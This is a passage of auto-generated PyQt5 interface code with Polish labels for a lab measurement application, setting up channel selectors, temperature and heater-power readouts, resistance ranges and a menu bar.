1)\n self.frame_14 = QtWidgets.QFrame(self.frame)\n self.frame_14.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_14.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_14.setLineWidth(1)\n self.frame_14.setMidLineWidth(0)\n self.frame_14.setObjectName(\"frame_14\")\n self.gridLayout_3 = QtWidgets.QGridLayout(self.frame_14)\n self.gridLayout_3.setObjectName(\"gridLayout_3\")\n self.label_14 = QtWidgets.QLabel(self.frame_14)\n self.label_14.setLineWidth(3)\n self.label_14.setObjectName(\"label_14\")\n self.gridLayout_3.addWidget(self.label_14, 0, 0, 1, 1)\n self.checkBox_14 = QtWidgets.QCheckBox(self.frame_14)\n self.checkBox_14.setText(\"\")\n self.checkBox_14.setObjectName(\"checkBox_14\")\n self.gridLayout_3.addWidget(self.checkBox_14, 0, 1, 1, 1)\n self.comboBox_14 = QtWidgets.QComboBox(self.frame_14)\n self.comboBox_14.setObjectName(\"comboBox_14\")\n self.comboBox_14.addItem(\"\")\n self.comboBox_14.addItem(\"\")\n self.gridLayout_3.addWidget(self.comboBox_14, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_14, 3, 1, 1, 1)\n self.frame_5 = QtWidgets.QFrame(self.frame)\n self.frame_5.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_5.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_5.setLineWidth(1)\n self.frame_5.setMidLineWidth(0)\n self.frame_5.setObjectName(\"frame_5\")\n self.gridLayout_19 = QtWidgets.QGridLayout(self.frame_5)\n self.gridLayout_19.setObjectName(\"gridLayout_19\")\n self.comboBox_5 = QtWidgets.QComboBox(self.frame_5)\n self.comboBox_5.setObjectName(\"comboBox_5\")\n self.comboBox_5.addItem(\"\")\n self.comboBox_5.addItem(\"\")\n self.gridLayout_19.addWidget(self.comboBox_5, 0, 2, 1, 1)\n self.checkBox_5 = QtWidgets.QCheckBox(self.frame_5)\n self.checkBox_5.setText(\"\")\n self.checkBox_5.setObjectName(\"checkBox_5\")\n self.gridLayout_19.addWidget(self.checkBox_5, 0, 1, 1, 1)\n self.label_5 = QtWidgets.QLabel(self.frame_5)\n self.label_5.setLineWidth(3)\n self.label_5.setObjectName(\"label_5\")\n self.gridLayout_19.addWidget(self.label_5, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_5, 4, 0, 1, 1)\n self.frame_15 = QtWidgets.QFrame(self.frame)\n self.frame_15.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_15.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_15.setLineWidth(1)\n self.frame_15.setMidLineWidth(0)\n self.frame_15.setObjectName(\"frame_15\")\n self.gridLayout_10 = QtWidgets.QGridLayout(self.frame_15)\n self.gridLayout_10.setObjectName(\"gridLayout_10\")\n self.comboBox_15 = QtWidgets.QComboBox(self.frame_15)\n self.comboBox_15.setObjectName(\"comboBox_15\")\n self.comboBox_15.addItem(\"\")\n self.comboBox_15.addItem(\"\")\n self.gridLayout_10.addWidget(self.comboBox_15, 0, 2, 1, 1)\n self.checkBox_15 = QtWidgets.QCheckBox(self.frame_15)\n self.checkBox_15.setText(\"\")\n self.checkBox_15.setObjectName(\"checkBox_15\")\n self.gridLayout_10.addWidget(self.checkBox_15, 0, 1, 1, 1)\n self.label_15 = QtWidgets.QLabel(self.frame_15)\n self.label_15.setLineWidth(3)\n self.label_15.setObjectName(\"label_15\")\n self.gridLayout_10.addWidget(self.label_15, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_15, 4, 1, 1, 1)\n self.frame_6 = QtWidgets.QFrame(self.frame)\n self.frame_6.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_6.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_6.setLineWidth(1)\n self.frame_6.setMidLineWidth(0)\n self.frame_6.setObjectName(\"frame_6\")\n self.gridLayout_15 = QtWidgets.QGridLayout(self.frame_6)\n self.gridLayout_15.setObjectName(\"gridLayout_15\")\n self.comboBox_6 = QtWidgets.QComboBox(self.frame_6)\n self.comboBox_6.setObjectName(\"comboBox_6\")\n self.comboBox_6.addItem(\"\")\n self.comboBox_6.addItem(\"\")\n self.gridLayout_15.addWidget(self.comboBox_6, 0, 2, 1, 1)\n self.checkBox_6 = QtWidgets.QCheckBox(self.frame_6)\n self.checkBox_6.setText(\"\")\n self.checkBox_6.setObjectName(\"checkBox_6\")\n self.gridLayout_15.addWidget(self.checkBox_6, 0, 1, 1, 1)\n self.label_6 = QtWidgets.QLabel(self.frame_6)\n self.label_6.setLineWidth(3)\n self.label_6.setObjectName(\"label_6\")\n self.gridLayout_15.addWidget(self.label_6, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_6, 5, 0, 1, 1)\n self.frame_16 = QtWidgets.QFrame(self.frame)\n self.frame_16.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_16.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_16.setLineWidth(1)\n self.frame_16.setMidLineWidth(0)\n self.frame_16.setObjectName(\"frame_16\")\n self.gridLayout_8 = QtWidgets.QGridLayout(self.frame_16)\n self.gridLayout_8.setObjectName(\"gridLayout_8\")\n self.label_16 = QtWidgets.QLabel(self.frame_16)\n self.label_16.setLineWidth(3)\n self.label_16.setObjectName(\"label_16\")\n self.gridLayout_8.addWidget(self.label_16, 0, 0, 1, 1)\n self.checkBox_16 = QtWidgets.QCheckBox(self.frame_16)\n self.checkBox_16.setText(\"\")\n self.checkBox_16.setObjectName(\"checkBox_16\")\n self.gridLayout_8.addWidget(self.checkBox_16, 0, 1, 1, 1)\n self.comboBox_16 = QtWidgets.QComboBox(self.frame_16)\n self.comboBox_16.setObjectName(\"comboBox_16\")\n self.comboBox_16.addItem(\"\")\n self.comboBox_16.addItem(\"\")\n self.gridLayout_8.addWidget(self.comboBox_16, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_16, 5, 1, 1, 1)\n self.frame_7 = QtWidgets.QFrame(self.frame)\n self.frame_7.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_7.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_7.setLineWidth(1)\n self.frame_7.setMidLineWidth(0)\n self.frame_7.setObjectName(\"frame_7\")\n self.gridLayout_18 = QtWidgets.QGridLayout(self.frame_7)\n self.gridLayout_18.setObjectName(\"gridLayout_18\")\n self.comboBox_7 = QtWidgets.QComboBox(self.frame_7)\n self.comboBox_7.setObjectName(\"comboBox_7\")\n self.comboBox_7.addItem(\"\")\n self.comboBox_7.addItem(\"\")\n self.gridLayout_18.addWidget(self.comboBox_7, 0, 2, 1, 1)\n self.checkBox_7 = QtWidgets.QCheckBox(self.frame_7)\n self.checkBox_7.setText(\"\")\n self.checkBox_7.setObjectName(\"checkBox_7\")\n self.gridLayout_18.addWidget(self.checkBox_7, 0, 1, 1, 1)\n self.label_7 = QtWidgets.QLabel(self.frame_7)\n self.label_7.setLineWidth(3)\n self.label_7.setObjectName(\"label_7\")\n self.gridLayout_18.addWidget(self.label_7, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_7, 6, 0, 1, 1)\n self.frame_17 = QtWidgets.QFrame(self.frame)\n self.frame_17.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_17.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_17.setLineWidth(1)\n self.frame_17.setMidLineWidth(0)\n self.frame_17.setObjectName(\"frame_17\")\n self.gridLayout_11 = QtWidgets.QGridLayout(self.frame_17)\n self.gridLayout_11.setObjectName(\"gridLayout_11\")\n self.label_17 = QtWidgets.QLabel(self.frame_17)\n self.label_17.setLineWidth(3)\n self.label_17.setObjectName(\"label_17\")\n self.gridLayout_11.addWidget(self.label_17, 0, 0, 1, 1)\n self.checkBox_17 = QtWidgets.QCheckBox(self.frame_17)\n self.checkBox_17.setText(\"\")\n self.checkBox_17.setObjectName(\"checkBox_17\")\n self.gridLayout_11.addWidget(self.checkBox_17, 0, 1, 1, 1)\n self.comboBox_17 = QtWidgets.QComboBox(self.frame_17)\n self.comboBox_17.setObjectName(\"comboBox_17\")\n self.comboBox_17.addItem(\"\")\n self.comboBox_17.addItem(\"\")\n self.gridLayout_11.addWidget(self.comboBox_17, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_17, 6, 1, 1, 1)\n self.frame_8 = QtWidgets.QFrame(self.frame)\n self.frame_8.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_8.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_8.setLineWidth(1)\n self.frame_8.setMidLineWidth(0)\n self.frame_8.setObjectName(\"frame_8\")\n self.gridLayout_17 = QtWidgets.QGridLayout(self.frame_8)\n self.gridLayout_17.setObjectName(\"gridLayout_17\")\n self.comboBox_8 = QtWidgets.QComboBox(self.frame_8)\n self.comboBox_8.setObjectName(\"comboBox_8\")\n self.comboBox_8.addItem(\"\")\n self.comboBox_8.addItem(\"\")\n self.gridLayout_17.addWidget(self.comboBox_8, 0, 2, 1, 1)\n self.checkBox_8 = QtWidgets.QCheckBox(self.frame_8)\n self.checkBox_8.setText(\"\")\n self.checkBox_8.setObjectName(\"checkBox_8\")\n self.gridLayout_17.addWidget(self.checkBox_8, 0, 1, 1, 1)\n self.label_8 = QtWidgets.QLabel(self.frame_8)\n self.label_8.setLineWidth(3)\n self.label_8.setObjectName(\"label_8\")\n self.gridLayout_17.addWidget(self.label_8, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_8, 7, 0, 1, 1)\n self.frame_18 = QtWidgets.QFrame(self.frame)\n self.frame_18.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_18.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_18.setLineWidth(1)\n self.frame_18.setMidLineWidth(0)\n self.frame_18.setObjectName(\"frame_18\")\n self.gridLayout_5 = QtWidgets.QGridLayout(self.frame_18)\n self.gridLayout_5.setObjectName(\"gridLayout_5\")\n self.label_18 = QtWidgets.QLabel(self.frame_18)\n self.label_18.setLineWidth(3)\n self.label_18.setObjectName(\"label_18\")\n self.gridLayout_5.addWidget(self.label_18, 0, 0, 1, 1)\n self.checkBox_18 = QtWidgets.QCheckBox(self.frame_18)\n self.checkBox_18.setText(\"\")\n self.checkBox_18.setObjectName(\"checkBox_18\")\n self.gridLayout_5.addWidget(self.checkBox_18, 0, 1, 1, 1)\n self.comboBox_18 = QtWidgets.QComboBox(self.frame_18)\n self.comboBox_18.setObjectName(\"comboBox_18\")\n self.comboBox_18.addItem(\"\")\n self.comboBox_18.addItem(\"\")\n self.gridLayout_5.addWidget(self.comboBox_18, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_18, 7, 1, 1, 1)\n self.frame_9 = QtWidgets.QFrame(self.frame)\n self.frame_9.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_9.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_9.setLineWidth(1)\n self.frame_9.setMidLineWidth(0)\n self.frame_9.setObjectName(\"frame_9\")\n self.gridLayout_16 = QtWidgets.QGridLayout(self.frame_9)\n self.gridLayout_16.setObjectName(\"gridLayout_16\")\n self.comboBox_9 = QtWidgets.QComboBox(self.frame_9)\n self.comboBox_9.setObjectName(\"comboBox_9\")\n self.comboBox_9.addItem(\"\")\n self.comboBox_9.addItem(\"\")\n self.gridLayout_16.addWidget(self.comboBox_9, 0, 2, 1, 1)\n self.checkBox_9 = QtWidgets.QCheckBox(self.frame_9)\n self.checkBox_9.setText(\"\")\n self.checkBox_9.setObjectName(\"checkBox_9\")\n self.gridLayout_16.addWidget(self.checkBox_9, 0, 1, 1, 1)\n self.label_9 = QtWidgets.QLabel(self.frame_9)\n self.label_9.setLineWidth(3)\n self.label_9.setObjectName(\"label_9\")\n self.gridLayout_16.addWidget(self.label_9, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_9, 8, 0, 1, 1)\n self.frame_19 = QtWidgets.QFrame(self.frame)\n self.frame_19.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_19.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_19.setLineWidth(1)\n self.frame_19.setMidLineWidth(0)\n self.frame_19.setObjectName(\"frame_19\")\n self.gridLayout_12 = QtWidgets.QGridLayout(self.frame_19)\n self.gridLayout_12.setObjectName(\"gridLayout_12\")\n self.checkBox_19 = QtWidgets.QCheckBox(self.frame_19)\n self.checkBox_19.setText(\"\")\n self.checkBox_19.setObjectName(\"checkBox_19\")\n self.gridLayout_12.addWidget(self.checkBox_19, 0, 1, 1, 1)\n self.comboBox_19 = QtWidgets.QComboBox(self.frame_19)\n self.comboBox_19.setObjectName(\"comboBox_19\")\n self.comboBox_19.addItem(\"\")\n self.comboBox_19.addItem(\"\")\n self.gridLayout_12.addWidget(self.comboBox_19, 0, 2, 1, 1)\n self.label_19 = QtWidgets.QLabel(self.frame_19)\n self.label_19.setLineWidth(3)\n self.label_19.setObjectName(\"label_19\")\n self.gridLayout_12.addWidget(self.label_19, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_19, 8, 1, 1, 1)\n self.frame_10 = QtWidgets.QFrame(self.frame)\n self.frame_10.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_10.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_10.setLineWidth(1)\n self.frame_10.setMidLineWidth(0)\n self.frame_10.setObjectName(\"frame_10\")\n self.gridLayout_13 = QtWidgets.QGridLayout(self.frame_10)\n self.gridLayout_13.setObjectName(\"gridLayout_13\")\n self.comboBox_10 = QtWidgets.QComboBox(self.frame_10)\n self.comboBox_10.setObjectName(\"comboBox_10\")\n self.comboBox_10.addItem(\"\")\n self.comboBox_10.addItem(\"\")\n self.gridLayout_13.addWidget(self.comboBox_10, 0, 2, 1, 1)\n self.checkBox_10 = QtWidgets.QCheckBox(self.frame_10)\n self.checkBox_10.setText(\"\")\n self.checkBox_10.setObjectName(\"checkBox_10\")\n self.gridLayout_13.addWidget(self.checkBox_10, 0, 1, 1, 1)\n self.label_10 = QtWidgets.QLabel(self.frame_10)\n self.label_10.setLineWidth(3)\n self.label_10.setObjectName(\"label_10\")\n self.gridLayout_13.addWidget(self.label_10, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_10, 9, 0, 1, 1)\n self.frame_20 = QtWidgets.QFrame(self.frame)\n self.frame_20.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_20.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_20.setLineWidth(1)\n self.frame_20.setMidLineWidth(0)\n self.frame_20.setObjectName(\"frame_20\")\n self.gridLayout_9 = QtWidgets.QGridLayout(self.frame_20)\n self.gridLayout_9.setObjectName(\"gridLayout_9\")\n self.label_20 = QtWidgets.QLabel(self.frame_20)\n self.label_20.setLineWidth(3)\n self.label_20.setObjectName(\"label_20\")\n self.gridLayout_9.addWidget(self.label_20, 0, 0, 1, 1)\n self.checkBox_20 = QtWidgets.QCheckBox(self.frame_20)\n self.checkBox_20.setText(\"\")\n self.checkBox_20.setObjectName(\"checkBox_20\")\n self.gridLayout_9.addWidget(self.checkBox_20, 0, 1, 1, 1)\n self.comboBox_20 = QtWidgets.QComboBox(self.frame_20)\n self.comboBox_20.setObjectName(\"comboBox_20\")\n self.comboBox_20.addItem(\"\")\n self.comboBox_20.addItem(\"\")\n self.gridLayout_9.addWidget(self.comboBox_20, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_20, 9, 1, 1, 1)\n #---------\n\n#-------------->\n self.stackedWidget.addWidget(self.Tryb_CH20)\n\n#<----zmiana trybu\n\n self.zmiana_trybu = QtWidgets.QComboBox(self.centralwidget)\n self.zmiana_trybu.setGeometry(QtCore.QRect(910, 10, 243, 25))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.zmiana_trybu.setFont(font)\n self.zmiana_trybu.setObjectName(\"zmiana_trybu\")\n self.zmiana_trybu.addItem(\"\")\n self.zmiana_trybu.addItem(\"\")\n self.zmiana_trybu.addItem(\"\")\n\n self.zmiana_trybu_tekst = QtWidgets.QLabel(self.centralwidget)\n self.zmiana_trybu_tekst.setGeometry(QtCore.QRect(870, 10, 35, 25))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.zmiana_trybu_tekst.setFont(font)\n self.zmiana_trybu_tekst.setObjectName(\"zmiana_trybu_tekst\")\n#------>\n\n#<-----nazwa pliku\n self.naglowek = QtWidgets.QLabel(self.centralwidget)\n self.naglowek.setGeometry(QtCore.QRect(540, 10, 250, 31))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.naglowek.setFont(font)\n self.naglowek.setObjectName(\"naglowek\")\n\n self.nazwa_pliku = QtWidgets.QLineEdit(self.centralwidget)\n self.nazwa_pliku.setGeometry(QtCore.QRect(310, 10, 122, 26))\n self.nazwa_pliku.setObjectName(\"nazwa_pliku\")\n\n self.nazwa_pliku_tekst = QtWidgets.QLabel(self.centralwidget)\n self.nazwa_pliku_tekst.setGeometry(QtCore.QRect(40, 10, 221, 26))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.nazwa_pliku_tekst.setFont(font)\n self.nazwa_pliku_tekst.setObjectName(\"nazwa_pliku_tekst\")\n\n self.nazwa_pliku_przedrostek = QtWidgets.QLabel(self.centralwidget)\n self.nazwa_pliku_przedrostek.setGeometry(QtCore.QRect(213, 10, 90, 26))\n self.nazwa_pliku_przedrostek.setMinimumSize(QtCore.QSize(60, 0))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.nazwa_pliku_przedrostek.setFont(font)\n self.nazwa_pliku_przedrostek.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.nazwa_pliku_przedrostek.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.nazwa_pliku_przedrostek.setObjectName(\"nazwa_pliku_przedrostek\")\n#---------->\n\n#<---pasek menu---\n MainWindow.setCentralWidget(self.centralwidget)\n self.menu = QtWidgets.QMenuBar(MainWindow)\n self.menu.setGeometry(QtCore.QRect(0, 0, 1200, 26))\n self.menu.setObjectName(\"menu\")\n self.Ustawienia = QtWidgets.QAction(self.menu)\n self.Ustawienia.setObjectName(\"Ustawienia\")\n self.Pomoc = QtWidgets.QAction(self.menu)\n self.Pomoc.setObjectName(\"Pomoc\")\n MainWindow.setMenuBar(self.menu)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.menu.addAction(self.Ustawienia)\n self.menu.addAction(self.Pomoc)\n#------->\n\n self.retranslateUi(MainWindow)\n self.stackedWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n \n #<---pomiar 2 próbek--\n self.P2_skala_log_t.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.P2_skala_log_p1.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.P2_skala_log_p2.setText(_translate(\"MainWindow\", \"Skala log\"))\n \n self.P2_wybor_kanalow_p1.setCurrentText(_translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p1.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_p1.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p1.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p1.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_p1.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_p1.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_p1.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_p1.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_p1.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_p1.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_p1.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_p1.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_p1.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_p1.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_p1.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_p1.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_p1.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_p1.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_p1.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_p1.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_p2.setCurrentText(_translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p2.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_p2.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p2.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p2.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_p2.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_p2.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_p2.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_p2.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_p2.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_p2.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_p2.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_p2.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_p2.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_p2.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_p2.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_p2.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_p2.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_p2.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_p2.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_p2.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_t.setCurrentText(_translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_t.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_t.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_t.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_t.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_t.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_t.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_t.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_t.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_t.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_t.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_t.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_t.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_t.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_t.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_t.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_t.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_t.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_t.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_t.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_t.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_tekst_p1.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n self.P2_wybor_kanalow_tekst_p2.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n self.P2_wybor_osix_tekst_p1.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n\n self.P2_wybor_osix_p1.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.P2_wybor_osix_p1.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n self.P2_wybor_osix_tekst_p2.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n self.P2_wybor_osix_p2.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.P2_wybor_osix_p2.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n self.P2_wybor_kanalow_tekst_t.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n\n self.P2_czestotliowsc_tekst.setText(_translate(\"MainWindow\", \"Częstotliwość próbkowania [s]:\"))\n\n self.P2_temperatura_tekst.setText(_translate(\"MainWindow\", \"Aktualna temperatura [K]:\"))\n self.P2_temperatura.setText(_translate(\"MainWindow\", \"0\"))\n \n self.P2_tempo_tekst.setText(_translate(\"MainWindow\", \"Tempo przyrostu temperatury [K/min.]:\"))\n self.P2_tempo.setText(_translate(\"MainWindow\", \"0\"))\n self.P2_sledzenie_temp_tekst.setText(_translate(\"MainWindow\", \"Automatyczne śledzenie temperatury [K]:\"))\n \n self.P2_moc_tekst.setText(_translate(\"MainWindow\", \"Moc grzałki [%]:\"))\n self.P2_moc.setText(_translate(\"MainWindow\", \"0\"))\n \n self.P2_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.P2_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.P2_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n\n self.P2_zakres_tekst_p1.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.P2_zakres_p1.setCurrentText(_translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p1.setItemText(0, _translate(\"MainWindow\",\"100 R\"))\n self.P2_zakres_p1.setItemText(1, _translate(\"MainWindow\",\"1 k\"))\n self.P2_zakres_p1.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.P2_zakres_p1.setItemText(3, _translate(\"MainWindow\", \"100 k\"))\n self.P2_zakres_p1.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p1.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.P2_zakres_p1.setItemText(6, _translate(\"MainWindow\", \"100 M\"))\n self.P2_zakres_tekst_p2.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.P2_zakres_p2.setCurrentText(_translate(\"MainWindow\", \"100 M\"))\n self.P2_zakres_p2.setItemText(0, _translate(\"MainWindow\", \"100 R\"))\n self.P2_zakres_p2.setItemText(1, _translate(\"MainWindow\", \"1 k\"))\n self.P2_zakres_p2.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.P2_zakres_p2.setItemText(3, _translate(\"MainWindow\", \"100 k\"))\n self.P2_zakres_p2.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p2.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.P2_zakres_p2.setItemText(6, _translate(\"MainWindow\", \"100 M\"))\n #--------->\n\n #<------pomiar 4-punktowy------\n self.R4_temperatura.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_osix_p.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.R4_wybor_osix_p.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n\n self.R4_tempo.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_kanalow_t.setCurrentText(_translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_t.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.R4_wybor_kanalow_t.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.R4_wybor_kanalow_t.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.R4_wybor_kanalow_t.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_t.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.R4_wybor_kanalow_t.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.R4_wybor_kanalow_t.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.R4_wybor_kanalow_t.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.R4_wybor_kanalow_t.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.R4_wybor_kanalow_t.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.R4_wybor_kanalow_t.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.R4_wybor_kanalow_t.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.R4_wybor_kanalow_t.setItemText(12, _translate(\"MainWindow\", \"13\"))\n 